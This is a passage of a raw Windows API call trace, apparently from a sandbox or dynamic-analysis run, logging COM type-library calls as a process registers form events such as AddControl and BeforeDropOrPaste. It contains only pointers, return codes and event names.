This=0x6c6be98, index=0x7, ppFuncDesc=0x185f50, pDummy=0xc0 | out: ppFuncDesc=0x185f50, pDummy=0xc0) returned 0x0 [0041.899] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c347b0 [0041.899] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.900] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x8, ppFuncDesc=0x185f50, pDummy=0xc0 | out: ppFuncDesc=0x185f50, pDummy=0xc0) returned 0x0 [0041.900] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c347d0 [0041.900] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.900] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x9, ppFuncDesc=0x185f50, pDummy=0xc0 | out: ppFuncDesc=0x185f50, pDummy=0xc0) returned 0x0 [0041.900] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c347f0 [0041.900] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.900] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xa, ppFuncDesc=0x185f50, pDummy=0xc0 | out: ppFuncDesc=0x185f50, pDummy=0xc0) returned 0x0 [0041.900] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34810 [0041.900] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.900] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xb, ppFuncDesc=0x185f50, pDummy=0x70 | out: ppFuncDesc=0x185f50, pDummy=0x70) returned 0x0 [0041.900] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34830 [0041.900] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.900] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xc, ppFuncDesc=0x185f50, pDummy=0x70 | out: ppFuncDesc=0x185f50, pDummy=0x70) returned 0x0 [0041.900] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34850 [0041.900] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.900] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xd, ppFuncDesc=0x185f50, pDummy=0x70 | out: ppFuncDesc=0x185f50, pDummy=0x70) returned 0x0 [0041.900] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34870 [0041.900] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.900] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xe, ppFuncDesc=0x185f50, pDummy=0xc0 | out: ppFuncDesc=0x185f50, pDummy=0xc0) returned 0x0 [0041.900] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34890 [0041.900] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.900] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xf, ppFuncDesc=0x185f50, pDummy=0x140 | out: ppFuncDesc=0x185f50, pDummy=0x140) returned 0x0 [0041.900] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c348b0 [0041.900] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.900] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6be98) returned 0x0 [0041.900] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6be98, ppTypeAttr=0x185f18, pDummy=0x6ccf070 | out: ppTypeAttr=0x185f18, pDummy=0x6ccf070*=0xffe20660) returned 0x0 [0041.900] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x0, ppFuncDesc=0x185de8, pDummy=0x185fe8 | out: ppFuncDesc=0x185de8, pDummy=0x185fe8*=0x6bc37d0) returned 0x0 [0041.900] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34990 [0041.900] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c34990) returned 0x10 [0041.900] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=768, rgBstrNames=0x6c34990, cMaxNames=0x2, pcNames=0x185f0c | out: rgBstrNames=0x6c34990*="AddControl", pcNames=0x185f0c*=0x2) returned 0x0 [0041.900] _wcsicmp (_String1="AddControl", _String2="Initialize") returned -8 [0041.900] _wcsicmp (_String1="AddControl", _String2="Resize") returned -17 [0041.900] _wcsicmp (_String1="AddControl", _String2="QueryClose") returned -16 [0041.900] _wcsicmp (_String1="AddControl", _String2="Activate") returned 1 [0041.900] _wcsicmp (_String1="AddControl", _String2="Deactivate") returned -3 [0041.900] _wcsicmp (_String1="AddControl", _String2="Terminate") returned -19 [0041.900] _wcsicmp (_String1="AddControl", _String2="Object") returned -14 [0041.900] _wcsicmp (_String1="AddControl", _String2="Name") returned -13 [0041.900] _wcsicmp (_String1="AddControl", _String2="Parent") returned -15 [0041.900] _wcsicmp (_String1="AddControl", _String2="Delete") returned -3 [0041.900] _wcsicmp (_String1="AddControl", _String2="Index") returned -8 [0041.900] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x1580, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6bef0) returned 0x0 [0041.901] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6bef0, ppTypeAttr=0x185f48, pDummy=0x1580 | out: ppTypeAttr=0x185f48, pDummy=0x1580) returned 0x0 [0041.901] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6bef0) returned 0x0 [0041.901] IUnknown:Release (This=0x6c6bef0) returned 0x0 [0041.901] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x1580, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6bef0) returned 0x0 [0041.901] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6bef0, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.901] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6bef0) returned 0x0 [0041.901] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.901] IUnknown:AddRef (This=0x6c6bef0) returned 0x2 [0041.901] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.901] IUnknown:Release (This=0x6c6bef0) returned 0x1 [0041.901] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6bef0, phRefType=0x185c30*=0x8) returned 0x0 [0041.901] IUnknown:Release (This=0x6c6bef0) returned 0x0 [0041.901] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.901] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x0, pFuncDesc=0x6c1eab8) returned 0x0 [0041.913] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x0, rgszNames=0x6c34990*="AddControl", cNames=0x2) returned 0x0 [0041.913] ITypeInfo:GetMops (in: This=0x6c6be98, memid=768, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.913] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=768, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x200000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x200000000) returned 0x0 [0041.913] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0x0, dwHelpContext=0x1e848a) returned 0x0 [0041.913] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.913] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x1, ppFuncDesc=0x185de8, pDummy=0xcdb039a05e9 | out: ppFuncDesc=0x185de8, pDummy=0xcdb039a05e9) returned 0x0 [0041.913] IMalloc:Alloc (This=0x7feffc15380, cb=0x48) returned 0x6b87250 [0041.913] IMalloc:GetSize (This=0x7feffc15380, pv=0x6b87250) returned 0x48 [0041.913] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=3, rgBstrNames=0x6b87250, cMaxNames=0x9, pcNames=0x185f0c | out: rgBstrNames=0x6b87250*="BeforeDragOver", pcNames=0x185f0c*=0x9) returned 0x0 [0041.913] _wcsicmp (_String1="BeforeDragOver", _String2="Initialize") returned -7 [0041.913] _wcsicmp (_String1="BeforeDragOver", _String2="Resize") returned -16 [0041.913] _wcsicmp (_String1="BeforeDragOver", _String2="QueryClose") returned -15 [0041.913] _wcsicmp (_String1="BeforeDragOver", _String2="Activate") returned 1 [0041.913] _wcsicmp (_String1="BeforeDragOver", _String2="Deactivate") returned -2 [0041.913] _wcsicmp (_String1="BeforeDragOver", _String2="Terminate") returned -18 [0041.913] _wcsicmp (_String1="BeforeDragOver", _String2="Object") returned -13 [0041.913] _wcsicmp (_String1="BeforeDragOver", _String2="Name") returned -12 [0041.913] _wcsicmp (_String1="BeforeDragOver", _String2="Parent") returned -14 [0041.913] _wcsicmp (_String1="BeforeDragOver", _String2="Delete") returned -2 [0041.913] _wcsicmp (_String1="BeforeDragOver", _String2="Index") returned -7 [0041.914] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x700, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c050) returned 0x0 [0041.914] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c050, ppTypeAttr=0x185f48, pDummy=0x700 | out: ppTypeAttr=0x185f48, pDummy=0x700) returned 0x0 [0041.914] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c050) returned 0x0 [0041.914] IUnknown:Release (This=0x6c6c050) returned 0x0 [0041.914] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x1580, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6bef0) returned 0x0 [0041.914] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6bef0, ppTypeAttr=0x185f48, pDummy=0x185dc0 | out: ppTypeAttr=0x185f48, pDummy=0x185dc0*=0x185f70) returned 0x0 [0041.914] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6bef0) returned 0x0 [0041.914] IUnknown:Release (This=0x6c6bef0) returned 0x0 [0041.914] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x900, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c158) returned 0x0 [0041.914] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c158, ppTypeAttr=0x185f48, pDummy=0x900 | out: ppTypeAttr=0x185f48, pDummy=0x900) returned 0x0 [0041.914] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c158) returned 0x0 [0041.914] IUnknown:Release (This=0x6c6c158) returned 0x0 [0041.914] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x1180, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c260) returned 0x0 [0041.914] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c260, ppTypeAttr=0x185f48, pDummy=0x1180 | out: ppTypeAttr=0x185f48, pDummy=0x1180) returned 0x0 [0041.914] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c260) returned 0x0 [0041.914] IUnknown:Release (This=0x6c6c260) returned 0x0 [0041.914] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x880, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c2b8) returned 0x0 [0041.914] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c2b8, ppTypeAttr=0x185f48, pDummy=0x880 | out: ppTypeAttr=0x185f48, pDummy=0x880) returned 0x0 [0041.914] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c2b8) returned 0x0 [0041.914] IUnknown:Release (This=0x6c6c2b8) returned 0x0 [0041.914] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x700, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c050) returned 0x0 [0041.914] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c050, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.914] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c050) returned 0x0 [0041.915] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.915] IUnknown:AddRef (This=0x6c6c050) returned 0x2 [0041.915] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.915] IUnknown:Release (This=0x6c6c050) returned 0x1 [0041.915] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c050, phRefType=0x185c30*=0x8) returned 0x0 [0041.915] IUnknown:Release (This=0x6c6c050) returned 0x0 [0041.915] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x1580, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6bef0) returned 0x0 [0041.915] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6bef0, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.915] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6bef0) returned 0x0 [0041.915] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.915] IUnknown:AddRef (This=0x6c6bef0) returned 0x2 [0041.915] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.915] IUnknown:Release (This=0x6c6bef0) returned 0x1 [0041.915] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6bef0, phRefType=0x185c30*=0xd) returned 0x0 [0041.915] IUnknown:Release (This=0x6c6bef0) returned 0x0 [0041.915] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x900, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c158) returned 0x0 [0041.915] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c158, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.915] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c158) returned 0x0 [0041.915] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.915] IUnknown:AddRef (This=0x6c6c158) returned 0x2 [0041.915] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.915] IUnknown:Release (This=0x6c6c158) returned 0x1 [0041.915] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c158, phRefType=0x185c30*=0x1) returned 0x0 [0041.915] IUnknown:Release (This=0x6c6c158) returned 0x0 [0041.915] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x1180, ppTInfo=0x185cc8 | out: ppTInfo=0x185cc8*=0x6c6c260) returned 0x0 [0041.915] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c260, ppTypeAttr=0x185d08, pDummy=0x185cb0 | out: ppTypeAttr=0x185d08, pDummy=0x185cb0*=0x185d30) returned 0x0 [0041.915] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c260) returned 0x0 [0041.915] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.915] IUnknown:AddRef (This=0x6c6c260) returned 0x2 [0041.915] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.915] IUnknown:Release (This=0x6c6c260) returned 0x1 [0041.916] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c260, phRefType=0x185cd0*=0x0) returned 0x0 [0041.916] IUnknown:Release (This=0x6c6c260) returned 0x0 [0041.916] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x880, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c2b8) returned 0x0 [0041.916] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c2b8, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.916] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c2b8) returned 0x0 [0041.916] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.916] IUnknown:AddRef (This=0x6c6c2b8) returned 0x2 [0041.916] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.916] IUnknown:Release (This=0x6c6c2b8) returned 0x1 [0041.916] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c2b8, phRefType=0x185c30*=0x0) returned 0x0 [0041.916] IUnknown:Release (This=0x6c6c2b8) returned 0x0 [0041.916] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.916] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x1, pFuncDesc=0x3ea0b88) returned 0x0 [0041.916] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x1, rgszNames=0x6b87250*="BeforeDragOver", cNames=0x9) returned 0x0 [0041.916] ITypeInfo:GetMops (in: This=0x6c6be98, memid=3, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.916] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=3, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x900000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x900000000) returned 0x0 [0041.916] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0x1, dwHelpContext=0x1e849e) returned 0x0 [0041.916] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.916] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x2, ppFuncDesc=0x185de8, pDummy=0x12d07c30185 | out: ppFuncDesc=0x185de8, pDummy=0x12d07c30185) returned 0x0 [0041.916] IMalloc:Alloc (This=0x7feffc15380, cb=0x48) returned 0x6b87250 [0041.916] IMalloc:GetSize (This=0x7feffc15380, pv=0x6b87250) returned 0x48 [0041.916] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=4, rgBstrNames=0x6b87250, cMaxNames=0x9, pcNames=0x185f0c | out: rgBstrNames=0x6b87250*="BeforeDropOrPaste", pcNames=0x185f0c*=0x9) returned 0x0 [0041.916] _wcsicmp (_String1="BeforeDropOrPaste", _String2="Initialize") returned -7 [0041.916] _wcsicmp (_String1="BeforeDropOrPaste", _String2="Resize") returned -16 [0041.916] _wcsicmp (_String1="BeforeDropOrPaste", _String2="QueryClose") returned -15 [0041.916] _wcsicmp (_String1="BeforeDropOrPaste", _String2="Activate") returned 1 [0041.916] _wcsicmp (_String1="BeforeDropOrPaste", _String2="Deactivate") returned -2 [0041.916] _wcsicmp (_String1="BeforeDropOrPaste", _String2="Terminate") returned -18 [0041.916] _wcsicmp (_String1="BeforeDropOrPaste", _String2="Object") returned -13 [0041.916] _wcsicmp (_String1="BeforeDropOrPaste", _String2="Name") returned -12 [0041.916] _wcsicmp (_String1="BeforeDropOrPaste", _String2="Parent") returned -14 [0041.916] _wcsicmp (_String1="BeforeDropOrPaste", _String2="Delete") returned -2 [0041.916] _wcsicmp (_String1="BeforeDropOrPaste", _String2="Index") returned -7 [0041.916] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x700, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c050) returned 0x0 [0041.917] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c050, ppTypeAttr=0x185f48, pDummy=0x185dc0 | out: ppTypeAttr=0x185f48, pDummy=0x185dc0*=0x185f70) returned 0x0 [0041.917] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c050) returned 0x0 [0041.917] IUnknown:Release (This=0x6c6c050) returned 0x0 [0041.917] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x1580, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6bef0) returned 0x0 [0041.917] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6bef0, ppTypeAttr=0x185f48, pDummy=0x185dc0 | out: ppTypeAttr=0x185f48, pDummy=0x185dc0*=0x185f70) returned 0x0 [0041.917] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6bef0) returned 0x0 [0041.917] IUnknown:Release (This=0x6c6bef0) returned 0x0 [0041.917] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x300, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c3c0) returned 0x0 [0041.917] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c3c0, ppTypeAttr=0x185f48, pDummy=0x300 | out: ppTypeAttr=0x185f48, pDummy=0x300) returned 0x0 [0041.917] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c3c0) returned 0x0 [0041.917] IUnknown:Release (This=0x6c6c3c0) returned 0x0 [0041.917] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x900, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c158) returned 0x0 [0041.917] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c158, ppTypeAttr=0x185f48, pDummy=0x185dc0 | out: ppTypeAttr=0x185f48, pDummy=0x185dc0*=0x185f70) returned 0x0 [0041.917] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c158) returned 0x0 [0041.917] IUnknown:Release (This=0x6c6c158) returned 0x0 [0041.917] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x880, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c2b8) returned 0x0 [0041.917] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c2b8, ppTypeAttr=0x185f48, pDummy=0x185dc0 | out: ppTypeAttr=0x185f48, pDummy=0x185dc0*=0x185f70) returned 0x0 [0041.917] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c2b8) returned 0x0 [0041.917] IUnknown:Release (This=0x6c6c2b8) returned 0x0 [0041.917] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x700, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c050) returned 0x0 [0041.917] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c050, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.917] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c050) returned 0x0 [0041.917] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.917] IUnknown:AddRef (This=0x6c6c050) returned 0x2 [0041.917] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.917] IUnknown:Release (This=0x6c6c050) returned 0x1 [0041.917] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c050, phRefType=0x185c30*=0x186928) returned 0x0 [0041.917] IUnknown:Release (This=0x6c6c050) returned 0x0 [0041.917] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x1580, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6bef0) returned 0x0 [0041.917] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6bef0, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.917] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6bef0) returned 0x0 [0041.917] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.918] IUnknown:AddRef (This=0x6c6bef0) returned 0x2 [0041.918] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.918] IUnknown:Release (This=0x6c6bef0) returned 0x1 [0041.918] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6bef0, phRefType=0x185c30*=0xd) returned 0x0 [0041.918] IUnknown:Release (This=0x6c6bef0) returned 0x0 [0041.918] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x300, ppTInfo=0x185cc8 | out: ppTInfo=0x185cc8*=0x6c6c3c0) returned 0x0 [0041.918] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c3c0, ppTypeAttr=0x185d08, pDummy=0x185cb0 | out: ppTypeAttr=0x185d08, pDummy=0x185cb0*=0x185d30) returned 0x0 [0041.918] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c3c0) returned 0x0 [0041.918] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.918] IUnknown:AddRef (This=0x6c6c3c0) returned 0x2 [0041.918] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.918] IUnknown:Release (This=0x6c6c3c0) returned 0x1 [0041.918] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c3c0, phRefType=0x185cd0*=0x0) returned 0x0 [0041.918] IUnknown:Release (This=0x6c6c3c0) returned 0x0 [0041.918] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x900, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c158) returned 0x0 [0041.918] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c158, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.918] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c158) returned 0x0 [0041.918] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.918] IUnknown:AddRef (This=0x6c6c158) returned 0x2 [0041.918] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.918] IUnknown:Release (This=0x6c6c158) returned 0x1 [0041.918] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c158, phRefType=0x185c30*=0x0) returned 0x0 [0041.918] IUnknown:Release (This=0x6c6c158) returned 0x0 [0041.918] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x880, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c2b8) returned 0x0 [0041.918] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c2b8, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.918] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c2b8) returned 0x0 [0041.918] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.918] IUnknown:AddRef (This=0x6c6c2b8) returned 0x2 [0041.918] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.918] IUnknown:Release (This=0x6c6c2b8) returned 0x1 [0041.918] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c2b8, phRefType=0x185c30*=0x19) returned 0x0 [0041.918] IUnknown:Release (This=0x6c6c2b8) returned 0x0 [0041.919] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.919] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x2, pFuncDesc=0x3ea0b88) returned 0x0 [0041.919] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x2, rgszNames=0x6b87250*="BeforeDropOrPaste", cNames=0x9) returned 0x0 [0041.919] ITypeInfo:GetMops (in: This=0x6c6be98, memid=4, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.919] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=4, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x900000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x900000000) returned 0x0 [0041.919] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0x2, dwHelpContext=0x1e84a8) returned 0x0 [0041.919] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.919] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x3, ppFuncDesc=0x185de8, pDummy=0x12e07c30185 | out: ppFuncDesc=0x185de8, pDummy=0x12e07c30185) returned 0x0 [0041.919] IMalloc:Alloc (This=0x7feffc15380, cb=0x8) returned 0x6cbdb40 [0041.919] IMalloc:GetSize (This=0x7feffc15380, pv=0x6cbdb40) returned 0x8 [0041.919] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-600, 